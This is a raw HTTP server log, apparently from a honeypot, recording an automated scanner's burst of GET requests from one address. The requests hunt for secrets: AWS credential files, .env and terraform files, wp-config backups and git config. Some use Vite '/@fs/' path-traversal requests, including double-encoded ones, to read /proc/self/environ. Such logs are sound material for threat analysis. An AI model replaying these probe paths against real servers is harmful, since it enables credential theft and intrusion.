[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57550
Query: raw??
Path: /@fs/home/node/.aws/credentials
URL: /@fs/home/node/.aws/credentials?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57546
Query: raw??
Path: /@fs/home/ubuntu/.aws/credentials
URL: /@fs/home/ubuntu/.aws/credentials?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57530
Query: raw??
Path: /@fs/root/.aws/credentials
URL: /@fs/root/.aws/credentials?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57514
Query: raw??
Path: /@fs/..%2f..%2f..%2f..%2f..%2fproc/self/environ
URL: /@fs/..%252f..%252f..%252f..%252f..%252fproc/self/environ?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57504
Query: raw??
Path: /@fs/..%2f..%2f..%2f..%2f..%2froot/.env
URL: /@fs/..%252f..%252f..%252f..%252f..%252froot/.env?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57490
Query: raw??
Path: /@fs/../../../../../app/.env
URL: /@fs/..%2f..%2f..%2f..%2f..%2fapp/.env?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57476
Query: raw??
Path: /@fs/../../../../../proc/self/environ
URL: /@fs/..%2f..%2f..%2f..%2f..%2fproc/self/environ?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57460
Query: raw??
Path: /@fs/../../../../../root/.env
URL: /@fs/..%2f..%2f..%2f..%2f..%2froot/.env?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57450
Query: raw??
Path: /@fs/.env
URL: /@fs/.env?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57442
Query: raw??
Path: /@fs/proc/self/environ
URL: /@fs/proc/self/environ?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57426
Query: raw??
Path: /@fs/root/.env
URL: /@fs/root/.env?raw??
Method: GET
[2026-02-19 13:07:15] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57422
Query: raw??
Path: /@fs/app/.env
URL: /@fs/app/.env?raw??
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57410
Path: /.git/config
URL: /.git/config
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57398
Path: /.git/logs/HEAD
URL: /.git/logs/HEAD
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57386
Path: /laravel/.env
URL: /laravel/.env
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57374
Path: /storage/framework/.env
URL: /storage/framework/.env
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57366
Path: /.env.vault
URL: /.env.vault
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57352
Path: /.secrets
URL: /.secrets
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57346
Path: /secrets.yml
URL: /secrets.yml
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57338
Path: /secrets.yaml
URL: /secrets.yaml
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57328
Path: /ecosystem.config.js
URL: /ecosystem.config.js
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57326
Path: /terraform.tfstate
URL: /terraform.tfstate
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57312
Path: /terraform.tfvars
URL: /terraform.tfvars
Method: GET
[2026-02-19 13:07:14] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28138
Path: /home/node/.aws/credentials
URL: /home/node/.aws/credentials
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28130
Path: /home/ec2-user/.aws/credentials
URL: /home/ec2-user/.aws/credentials
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28128
Path: /home/ubuntu/.aws/credentials
URL: /home/ubuntu/.aws/credentials
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28118
Path: /root/.aws/credentials
URL: /root/.aws/credentials
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28112
Path: /root/.streamlit/secrets.toml
URL: /root/.streamlit/secrets.toml
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28108
Path: /.streamlit/secrets.toml
URL: /.streamlit/secrets.toml
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28092
Path: /tmp/.env
URL: /tmp/.env
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28080
Path: /temp/.env
URL: /temp/.env
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28074
Path: /old/.env
URL: /old/.env
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28068
Path: /backups/.env
URL: /backups/.env
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28062
Path: /backup/.env
URL: /backup/.env
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28046
Path: /api/env
URL: /api/env
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28042
Path: /api/settings
URL: /api/settings
Method: GET
[2026-02-19 13:07:13] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28030
Path: /api/config
URL: /api/config
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28024
Path: /actuator/configprops
URL: /actuator/configprops
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28018
Path: /actuator/env
URL: /actuator/env
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28014
Path: /data/config.json
URL: /data/config.json
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:28000
Path: /conf/settings.json
URL: /conf/settings.json
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27998
Path: /config/local.json
URL: /config/local.json
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27988
Path: /config/default.json
URL: /config/default.json
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27976
Path: /config/development.json
URL: /config/development.json
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27972
Path: /config/production.json
URL: /config/production.json
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27958
Path: /serverless.yaml
URL: /serverless.yaml
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27950
Path: /serverless.yml
URL: /serverless.yml
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27948
Path: /config.toml
URL: /config.toml
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27938
Path: /config.yml
URL: /config.yml
Method: GET
[2026-02-19 13:07:12] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27926
Path: /config.yaml
URL: /config.yaml
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27912
Path: /appsettings.Production.json
URL: /appsettings.Production.json
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27896
Path: /appsettings.Development.json
URL: /appsettings.Development.json
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27880
Path: /appsettings.json
URL: /appsettings.json
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27874
Path: /application-prod.properties
URL: /application-prod.properties
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27858
Path: /application-dev.properties
URL: /application-dev.properties
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27856
Path: /application.yaml
URL: /application.yaml
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27848
Path: /application.yml
URL: /application.yml
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27836
Path: /application.properties
URL: /application.properties
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27820
Path: /config/app.php
URL: /config/app.php
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27806
Path: /wp-config.php~
URL: /wp-config.php~
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27790
Path: /wp-config.php.txt
URL: /wp-config.php.txt
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27784
Path: /wp-config.php.save
URL: /wp-config.php.save
Method: GET
[2026-02-19 13:07:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27774
Path: /wp-config.php.old
URL: /wp-config.php.old
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27760
Path: /wp-config.php.bak
URL: /wp-config.php.bak
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27750
Path: /config/master.key
URL: /config/master.key
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27734
Path: /config/secrets.yml
URL: /config/secrets.yml
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27718
Path: /secrets.py
URL: /secrets.py
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27706
Path: /config.py
URL: /config.py
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27696
Path: /settings.py
URL: /settings.py
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27688
Path: /js/main.js
URL: /js/main.js
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27674
Path: /js/app.js
URL: /js/app.js
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27658
Path: /_next/static/chunks/app.js
URL: /_next/static/chunks/app.js
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27648
Path: /_next/static/chunks/main.js
URL: /_next/static/chunks/main.js
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27638
Path: /assets/app.js
URL: /assets/app.js
Method: GET
[2026-02-19 13:07:10] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27626
Path: /assets/index.js
URL: /assets/index.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27620
Path: /build/static/js/main.js
URL: /build/static/js/main.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27616
Path: /dist/bundle.js
URL: /dist/bundle.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27608
Path: /dist/app.js
URL: /dist/app.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27596
Path: /dist/main.js
URL: /dist/main.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27584
Path: /static/js/bundle.js
URL: /static/js/bundle.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27568
Path: /static/js/app.js
URL: /static/js/app.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27554
Path: /static/js/main.js
URL: /static/js/main.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27546
Path: /chunk.js
URL: /chunk.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27536
Path: /vendor.js
URL: /vendor.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27520
Path: /main.bundle.js
URL: /main.bundle.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27512
Path: /app.bundle.js
URL: /app.bundle.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27504
Path: /bundle.js
URL: /bundle.js
Method: GET
[2026-02-19 13:07:09] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27488
Path: /server.js
URL: /server.js
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27480
Path: /index.js
URL: /index.js
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27464
Path: /main.js
URL: /main.js
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27452
Path: /app.js
URL: /app.js
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27448
Path: /credentials.json
URL: /credentials.json
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27440
Path: /secrets.json
URL: /secrets.json
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27426
Path: /settings.json
URL: /settings.json
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27422
Path: /settings.js
URL: /settings.js
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27406
Path: /config.json
URL: /config.json
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27400
Path: /config.js
URL: /config.js
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27384
Path: /docker-compose.prod.yml
URL: /docker-compose.prod.yml
Method: GET
[2026-02-19 13:07:08] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:27380
